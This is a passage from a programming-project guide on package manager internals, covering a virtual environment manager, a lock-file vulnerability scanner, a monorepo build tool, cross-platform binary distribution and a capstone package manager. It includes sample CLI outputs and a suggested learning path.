  • PATH Mechanics: “How Linux Works, 3rd Edition” Chapter 2 - Brian Ward

Difficulty: Advanced Time estimate: 1-2 weeks Prerequisites: Shell scripting, environment variables, PATH understanding

Real world outcome:

$ ./venv-manager create myproject --python 3.11

Creating virtual environment 'myproject'...
  Base Python: /usr/bin/python3.11
  Environment: ~/.venvs/myproject/

Creating directory structure:
  ✓ ~/.venvs/myproject/bin/
  ✓ ~/.venvs/myproject/lib/python3.11/site-packages/
  ✓ ~/.venvs/myproject/include/

Creating symlinks:
  ✓ bin/python → /usr/bin/python3.11
  ✓ bin/python3 → python

Generating activation scripts:
  ✓ bin/activate (bash/zsh)
  ✓ bin/activate.fish
  ✓ bin/activate.ps1

✓ Environment created. Activate with:
  source ~/.venvs/myproject/bin/activate

$ source ~/.venvs/myproject/bin/activate

(myproject) $ which python
~/.venvs/myproject/bin/python

(myproject) $ pip install requests
# Installs to ~/.venvs/myproject/lib/python3.11/site-packages/

(myproject) $ pip list
Package    Version
---------- -------
requests   2.31.0
urllib3    2.1.0
pip        23.3.1

(myproject) $ deactivate

$ which python
/usr/bin/python3

$ pip list
# Shows system packages, not myproject's

Implementation Hints:

  • The key insight: virtual environments work by prepending their bin/ to PATH
  • Generate an activate script that: saves old PATH, prepends new PATH, sets PS1 prompt, defines deactivate function
  • Create symlinks from env/bin/python to the actual interpreter
  • For Python, also set VIRTUAL_ENV environment variable (pip uses this to know where to install)
  • The pyvenv.cfg file tells Python to use the environment’s site-packages
  • Consider supporting multiple shells (bash, zsh, fish have different syntax)

Learning milestones:

  1. Create isolated directory structure → You understand env layout
  2. Generate working activation scripts → You understand shell integration
  3. Packages install to correct location → You understand isolation
  4. Multiple envs coexist without conflict → You understand the full system

Project 11: Package Vulnerability Scanner

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Go
  • Alternative Programming Languages: Rust, Python, TypeScript
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Security / APIs
  • Software or Tool: npm audit / cargo audit Clone
  • Main Book: “Foundations of Information Security” by Jason Andress

What you’ll build: A scanner that reads your lock file, queries vulnerability databases (like OSV, GitHub Advisory Database, or npm’s audit API), and reports known CVEs with severity ratings and remediation advice.

Why it teaches package managers: Modern package managers include npm audit and cargo audit because supply chain security matters. You’ll understand how vulnerability databases work, why SBOMs (Software Bills of Materials) exist, and how to assess risk.

Core challenges you’ll face:

  • Parsing lock files (extract package names and exact versions) → maps to file parsing
  • Querying vulnerability APIs (OSV, GitHub, npm) → maps to API integration
  • Matching versions to advisories (is 4.17.15 affected by CVE-2021-xxxx?) → maps to version ranges
  • Severity scoring (CVSS, understanding impact) → maps to risk assessment
  • Generating actionable reports (what to upgrade to) → maps to user experience

Resources for key challenges:

Key Concepts:

  • CVE and CVSS: “Foundations of Information Security” Chapter 15 - Jason Andress
  • Software Bill of Materials: SBOM Overview - CISA guidance
  • API Integration: “Design and Build Great Web APIs” Chapter 4 - Mike Amundsen
  • Supply Chain Security: “Practical Malware Analysis” Chapter 1 (concepts) - Sikorski & Honig

Difficulty: Intermediate Time estimate: 1 week Prerequisites: HTTP APIs, JSON parsing, lock file understanding

Real world outcome:

$ ./vuln-scanner scan package-lock.json

Scanning 247 packages from package-lock.json...
Querying OSV database...

Found 3 vulnerabilities:

┌────────────────────────────────────────────────────────────────────┐
│ CRITICAL: lodash < 4.17.21                                         │
│ CVE-2021-23337 - Command Injection                                 │
├────────────────────────────────────────────────────────────────────┤
│ Your version: 4.17.15                                              │
│ Fixed in: 4.17.21                                                  │
│ CVSS: 9.8 (Critical)                                               │
│ Introduced by: express → body-parser → lodash                      │
│                                                                    │
│ Remediation: npm update lodash                                     │
└────────────────────────────────────────────────────────────────────┘

┌────────────────────────────────────────────────────────────────────┐
│ HIGH: minimist < 1.2.6                                             │
│ CVE-2021-44906 - Prototype Pollution                               │
├────────────────────────────────────────────────────────────────────┤
│ Your version: 1.2.0                                                │
│ Fixed in: 1.2.6                                                    │
│ CVSS: 7.5 (High)                                                   │
│ Introduced by: mocha → mkdirp → minimist                           │
│                                                                    │
│ Remediation: npm update minimist                                   │
└────────────────────────────────────────────────────────────────────┘

┌────────────────────────────────────────────────────────────────────┐
│ MODERATE: glob-parent < 5.1.2                                      │
│ CVE-2020-28469 - Regular Expression DoS                            │
├────────────────────────────────────────────────────────────────────┤
│ Your version: 5.0.0                                                │
│ Fixed in: 5.1.2                                                    │
│ CVSS: 5.3 (Moderate)                                               │
│                                                                    │
│ Remediation: npm update glob-parent                                │
└────────────────────────────────────────────────────────────────────┘

Summary:
  Total packages: 247
  Vulnerabilities: 3 (1 critical, 1 high, 1 moderate)

Run with --fix to automatically update vulnerable packages.

Implementation Hints:

  • OSV API: POST https://api.osv.dev/v1/querybatch with list of packages
  • Parse lock files to extract {"package": {"name": "...", "ecosystem": "npm"}, "version": "..."}
  • Match advisory affected ranges against installed versions (use your semver library from Project 1!)
  • CVSS scores: 0.0-3.9 (Low), 4.0-6.9 (Medium), 7.0-8.9 (High), 9.0-10.0 (Critical)
  • For remediation, find the minimum fixed version that satisfies the original constraint

Learning milestones:

  1. Parse lock files and query APIs → You understand the data flow
  2. Match versions to advisories → You understand vulnerability ranges
  3. Generate actionable reports → You understand security UX
  4. Trace vulnerability paths → You understand transitive dependencies

Project 12: Monorepo Workspace Manager

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: TypeScript
  • Alternative Programming Languages: Rust, Go, Python
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 4. The “Open Core” Infrastructure
  • Difficulty: Level 4: Expert
  • Knowledge Area: Build Systems / Graph Algorithms
  • Software or Tool: npm workspaces / Turborepo Clone
  • Main Book: “Software Architecture in Practice” by Bass, Clements & Kazman

What you’ll build: A monorepo manager that handles multiple packages in one repository, manages inter-package dependencies, builds in correct order with caching, and only rebuilds what changed.

Why it teaches package managers: Modern development uses monorepos (Google, Facebook, Microsoft). Tools like Lerna, Nx, and Turborepo add layers on top of package managers. You’ll understand workspace protocols, local dependencies, and incremental builds.

Core challenges you’ll face:

  • Workspace discovery (find all packages in repo) → maps to filesystem traversal
  • Local dependency linking (pkg-a depends on pkg-b in same repo) → maps to symlinks
  • Topological build order (build deps before dependents) → maps to graph algorithms
  • Incremental builds (only rebuild what changed) → maps to change detection
  • Task caching (don’t rebuild if inputs unchanged) → maps to content-addressable caching

Key Concepts:

  • Topological Sort: “Algorithms, Fourth Edition” Chapter 4.2 - Sedgewick & Wayne
  • Build Systems: “The GNU Make Book” Chapter 1 - John Graham-Cumming
  • Content Hashing: “Designing Data-Intensive Applications” Chapter 3 - Kleppmann
  • Monorepo Patterns: Turborepo docs - Architecture explanation

Difficulty: Expert Time estimate: 3-4 weeks Prerequisites: All previous projects, build system understanding

Real world outcome:

$ tree packages/
packages/
├── core/
│   ├── package.json  # "name": "@myorg/core"
│   └── src/
├── utils/
│   ├── package.json  # "name": "@myorg/utils", deps: ["@myorg/core"]
│   └── src/
├── api/
│   ├── package.json  # "name": "@myorg/api", deps: ["@myorg/core", "@myorg/utils"]
│   └── src/
└── web/
    ├── package.json  # "name": "@myorg/web", deps: ["@myorg/api"]
    └── src/

$ ./workspace-manager analyze

Workspace: 4 packages
  @myorg/core (0 internal deps)
  @myorg/utils (1 internal dep: core)
  @myorg/api (2 internal deps: core, utils)
  @myorg/web (1 internal dep: api)

Build order (topological):
  1. @myorg/core
  2. @myorg/utils
  3. @myorg/api
  4. @myorg/web

$ ./workspace-manager build

Building workspace...

@myorg/core
  Hash: a1b2c3d4
  Cache: MISS
  Building... ✓ (2.1s)

@myorg/utils
  Hash: e5f6g7h8
  Cache: MISS
  Building... ✓ (1.3s)

@myorg/api
  Hash: i9j0k1l2
  Cache: MISS
  Building... ✓ (3.7s)

@myorg/web
  Hash: m3n4o5p6
  Cache: MISS
  Building... ✓ (8.2s)

Total: 15.3s (0 cached)

# Make a change only to @myorg/utils

$ ./workspace-manager build

Building workspace (incremental)...

@myorg/core
  Hash: a1b2c3d4
  Cache: HIT ✓ (restored in 0.1s)

@myorg/utils
  Hash: q7r8s9t0 (changed)
  Cache: MISS
  Building... ✓ (1.3s)

@myorg/api
  Hash: u1v2w3x4 (deps changed)
  Cache: MISS
  Building... ✓ (3.7s)

@myorg/web
  Hash: y5z6a7b8 (deps changed)
  Cache: MISS
  Building... ✓ (8.2s)

Total: 13.4s (1 cached, saved 2.1s)

Implementation Hints:

  • Discover workspaces by finding all package.json files with workspace globs (e.g., "workspaces": ["packages/*"])
  • Local dependencies are detected when a dep name matches another workspace package
  • For linking, create symlinks in node_modules pointing to the local package
  • Compute content hashes by hashing all input files (source, package.json) and dependency hashes
  • Store cache in .workspace-cache/ with hash as filename
  • When a package’s hash changes, all dependents must also be considered changed

Learning milestones:

  1. Discover and link workspaces → You understand monorepo structure
  2. Build in topological order → You understand dependency ordering
  3. Implement content-based caching → You understand incremental builds
  4. Only rebuild affected packages → You understand the full system

Project 13: Binary Distribution (Platform-Specific Packages)

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Rust
  • Alternative Programming Languages: Go, C, C++
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 4: Expert
  • Knowledge Area: Cross-Compilation / Platform Detection
  • Software or Tool: Binary Package Distributor
  • Main Book: “Advanced C and C++ Compiling” by Milan Stevanovic

What you’ll build: A system that builds your CLI tool for multiple platforms (linux-x64, darwin-arm64, windows-x64), packages them with platform-specific metadata, and serves the correct binary based on the user’s system.

Why it teaches package managers: When you npm install esbuild or cargo install ripgrep, how does it know to download the macOS ARM binary on your M1 Mac? This project reveals platform detection, optional dependencies, and binary distribution.

Core challenges you’ll face:

  • Cross-compilation (build for different OS/arch from one machine) → maps to compiler toolchains
  • Platform detection (os.platform(), os.arch()) → maps to system identification
  • Optional/platform-specific dependencies (optionalDependencies in npm) → maps to conditional deps
  • Binary packaging (tarballs, zips, npm packages) → maps to distribution formats
  • Installation selection (pick correct binary at install time) → maps to runtime selection

Key Concepts:

  • Cross-Compilation: “Advanced C and C++ Compiling” Chapter 9 - Milan Stevanovic
  • Platform Detection: “The Linux Programming Interface” Chapter 12 - Michael Kerrisk
  • npm optionalDependencies: npm docs - How esbuild does it
  • ABI Compatibility: “Low-Level Programming” Chapter 14 - Igor Zhirkov

Difficulty: Expert Time estimate: 2-3 weeks Prerequisites: Cross-compilation basics, platform differences

Real world outcome:

$ ./platform-builder build ./my-cli

Cross-compiling my-cli for 6 platforms...

  linux-x64:
    Toolchain: x86_64-unknown-linux-gnu
    Building... ✓
    Binary: 4.2 MB

  linux-arm64:
    Toolchain: aarch64-unknown-linux-gnu
    Building... ✓
    Binary: 3.8 MB

  darwin-x64:
    Toolchain: x86_64-apple-darwin
    Building... ✓
    Binary: 3.9 MB

  darwin-arm64:
    Toolchain: aarch64-apple-darwin
    Building... ✓
    Binary: 3.6 MB

  win32-x64:
    Toolchain: x86_64-pc-windows-msvc
    Building... ✓
    Binary: 4.8 MB (my-cli.exe)

  win32-arm64:
    Toolchain: aarch64-pc-windows-msvc
    Building... ✓
    Binary: 4.1 MB

Creating npm packages...
  @my-cli/linux-x64@1.0.0 → dist/my-cli-linux-x64-1.0.0.tgz
  @my-cli/linux-arm64@1.0.0 → dist/my-cli-linux-arm64-1.0.0.tgz
  @my-cli/darwin-x64@1.0.0 → dist/my-cli-darwin-x64-1.0.0.tgz
  @my-cli/darwin-arm64@1.0.0 → dist/my-cli-darwin-arm64-1.0.0.tgz
  @my-cli/win32-x64@1.0.0 → dist/my-cli-win32-x64-1.0.0.tgz
  @my-cli/win32-arm64@1.0.0 → dist/my-cli-win32-arm64-1.0.0.tgz

Creating wrapper package...
  my-cli@1.0.0 → dist/my-cli-1.0.0.tgz
  optionalDependencies: {
    "@my-cli/linux-x64": "1.0.0",
    "@my-cli/darwin-arm64": "1.0.0",
    ...
  }

# On user's machine (macOS ARM):
$ npm install my-cli

Installing my-cli...
  Resolving platform: darwin-arm64
  Selected: @my-cli/darwin-arm64
  Downloading... ✓

$ npx my-cli --version
my-cli 1.0.0 (darwin-arm64)

Implementation Hints:

  • Use Rust’s cross-compilation with cross tool, or Go’s GOOS=linux GOARCH=amd64
  • npm’s optionalDependencies are tried but don’t fail if unavailable—use this for platform packages
  • The wrapper package has a postinstall script that copies the correct binary from the platform package
  • Use os.platform() and os.arch() in Node.js to detect the current platform
  • Consider supporting fallback to building from source if no binary is available

Learning milestones:

  1. Cross-compile for multiple platforms → You understand toolchains
  2. Create platform-specific npm packages → You understand distribution
  3. Automatically select correct binary → You understand platform detection
  4. Handle missing platforms gracefully → You understand fallbacks

Project 14: Full Package Manager (Capstone)

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Rust
  • Alternative Programming Languages: Go, C
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 5. The “Industry Disruptor” (VC-Backable Platform)
  • Difficulty: Level 5: Master
  • Knowledge Area: Systems Programming / Full Stack
  • Software or Tool: Complete Package Manager
  • Main Book: “Designing Data-Intensive Applications” by Martin Kleppmann

What you’ll build: A complete, working package manager with its own manifest format, lock files, registry, dependency resolution, installation, and CLI—capable of managing real projects.

Why it teaches package managers: This is the capstone. You’ll integrate everything: semver parsing, dependency resolution, registry protocol, lock files, installation, caching, and security. You’ll understand why npm, Cargo, and pip made the design decisions they did.

Core challenges you’ll face:

  • Designing a manifest format (your own package.json/Cargo.toml) → maps to language design
  • Implementing full resolution (SAT-based or backtracking) → maps to algorithms
  • Building a registry server (with publish/download APIs) → maps to distributed systems
  • Efficient caching (content-addressable, shared across projects) → maps to storage
  • Good CLI UX (progress bars, error messages, colors) → maps to user experience
  • Security (checksums, sandboxed scripts, vulnerability checks) → maps to security engineering

Key Concepts:

  • All previous project concepts, integrated
  • CLI Design: “The Pragmatic Programmer” Chapter 7 - Thomas & Hunt
  • API Design: “Design and Build Great Web APIs” - Mike Amundsen
  • Systems Architecture: “Designing Data-Intensive Applications” - Martin Kleppmann

Difficulty: Master Time estimate: 2-3 months Prerequisites: All previous projects (1-13)

Real world outcome:

$ mypkg init my-project

Creating new project: my-project
  ✓ Created mypkg.toml
  ✓ Created mypkg.lock
  ✓ Created src/main.rs

$ cat mypkg.toml
[package]
name = "my-project"
version = "0.1.0"

[dependencies]
json = "^1.0"
http-client = "^2.0"

$ mypkg install

Resolving dependencies...
  json: 12 versions available
  http-client: 8 versions available

Running SAT solver...
  ✓ Solution found in 23ms

Fetching packages...
  ▸ json@1.2.3        [████████████████████] 100%
  ▸ http-client@2.1.0 [████████████████████] 100%
  ▸ url-parser@1.0.0  [████████████████████] 100% (transitive)

Installing to ./mypkg_modules/...
  ✓ json@1.2.3
  ✓ url-parser@1.0.0
  ✓ http-client@2.1.0

Generating lock file...
  ✓ mypkg.lock updated

Installed 3 packages in 1.2s

$ mypkg audit

Scanning for vulnerabilities...
  ✓ No known vulnerabilities found

$ mypkg publish

Publishing my-project@0.1.0...
  Packing... ✓ (12 files, 24KB)
  Computing integrity... sha512-abc123...
  Uploading to registry.mypkg.dev...
  ✓ Published my-project@0.1.0

View at: https://registry.mypkg.dev/packages/my-project

Implementation Hints:

  • Start by defining your manifest format (TOML is recommended for readability)
  • Implement the core loop: parse manifest → resolve deps → fetch packages → install → generate lock
  • Build the registry server alongside the client (you’ll need both)
  • Focus on good error messages—package manager errors are notoriously cryptic
  • Implement a global cache (~/.mypkg/cache/) shared across all projects
  • Add --verbose and --debug flags for troubleshooting
  • Consider writing a specification document for your package format

Learning milestones:

  1. Basic install flow works → Core system functions
  2. Lock file enables reproducibility → Deterministic builds
  3. Registry handles publish/download → Distributed system works
  4. Resolution handles complex graphs → Algorithm is correct
  5. Real projects can use it → It’s a real package manager!

Project Comparison Table

Project Difficulty Time Depth of Understanding Fun Factor
1. Semver Parser Intermediate Weekend ★★☆☆☆ ★★☆☆☆
2. Dependency Graph Intermediate Weekend ★★★☆☆ ★★★☆☆
3. SAT Solver Expert 2-4 weeks ★★★★★ ★★★★☆
4. Registry Client Intermediate 1 week ★★★☆☆ ★★★☆☆
5. Lock File Generator Advanced 1-2 weeks ★★★★☆ ★★★☆☆
6. Cellar Installer Advanced 1-2 weeks ★★★★☆ ★★★★☆
7. node_modules Hoisting Advanced 1-2 weeks ★★★★☆ ★★★☆☆
8. Build Script Executor Advanced 1-2 weeks ★★★☆☆ ★★★☆☆
9. Private Registry Advanced 2-3 weeks ★★★★☆ ★★★★☆
10. Virtual Env Manager Advanced 1-2 weeks ★★★☆☆ ★★★☆☆
11. Vulnerability Scanner Intermediate 1 week ★★★☆☆ ★★★★☆
12. Monorepo Manager Expert 3-4 weeks ★★★★★ ★★★★☆
13. Binary Distribution Expert 2-3 weeks ★★★★☆ ★★★★☆
14. Full Package Manager Master 2-3 months ★★★★★ ★★★★★

Based on building a solid foundation before tackling complex integration:

Phase 1: Foundations (2-3 weeks)

  1. Project 1: Semver Parser - You’ll use this everywhere
  2. Project 2: Dependency Graph - Core data structure

Phase 2: Core Mechanics (4-6 weeks)

  1. Project 4: Registry Client - Understand the network layer
  2. Project 5: Lock File Generator - Understand reproducibility
  3. Project 6: Cellar Installer - Understand installation

Phase 3: Advanced Topics (6-8 weeks)

  1. Project 3: SAT Solver - The hard problem
  2. Project 9: Private Registry - Server-side understanding
  3. Project 7: node_modules Hoisting - npm’s complexity

Phase 4: Security & Scale (4-6 weeks)

  1. Project 11: Vulnerability Scanner - Security matters
  2. Project 8: Build Script Executor - Handle native code
  3. Project 12: Monorepo Manager - Enterprise patterns

Phase 5: Capstone (2-3 months)

  1. Project 14: Full Package Manager - Put it all together

Final Capstone: “MyPkg” - A Complete Package Manager

If you complete projects 1-13, you’ll have built all the pieces. The capstone (Project 14) is integrating them into a cohesive, usable system. Here’s what makes it real:

A working package manager needs:

  • A name and identity (logo, docs site, CLI personality)
  • A specification document (what’s valid, what’s not)
  • A registry (even if just local file-based to start)
  • Error messages that help users fix problems
  • Performance that doesn’t frustrate users
  • At least one real project using it

You’ll know you’ve succeeded when:

  • Someone else can read your spec and implement a compatible client
  • A real project can be managed entirely with your tool
  • Resolution handles diamond dependencies correctly
  • The lock file produces identical installations across machines
  • Your CLI feels as polished as npm or Cargo

This is a journey from “package managers are magic” to “I could build npm.” By the end, you’ll have a deep understanding of one of the most important pieces of modern development infrastructure.


Key Resources Summary

Essential Reading

  • “Designing Data-Intensive Applications” by Martin Kleppmann - For understanding caching, content addressing, distributed systems
  • “The Linux Programming Interface” by Michael Kerrisk - For filesystem, processes, and low-level operations
  • “Algorithms, Fourth Edition” by Sedgewick & Wayne - For graph algorithms and data structures

Online Resources

Reference Implementations to Study

  • pnpm - Innovative content-addressable approach
  • uv - Fast Python package manager in Rust
  • Cargo - Well-designed, readable codebase
  • Verdaccio - Private npm registry

Summary

# Project Main Language
1 Semver Parser & Comparator Rust
2 Dependency Graph Builder & Cycle Detector Python
3 Version Constraint SAT Solver Python
4 Package Registry Client Go
5 Lock File Generator Rust
6 Cellar-Style Package Installer C
7 node_modules Hoisting Simulator TypeScript
8 Build Script Executor Go
9 Private Registry Server Go
10 Virtual Environment Manager Rust
11 Package Vulnerability Scanner Go
12 Monorepo Workspace Manager TypeScript
13 Binary Distribution System Rust
14 Full Package Manager (Capstone) Rust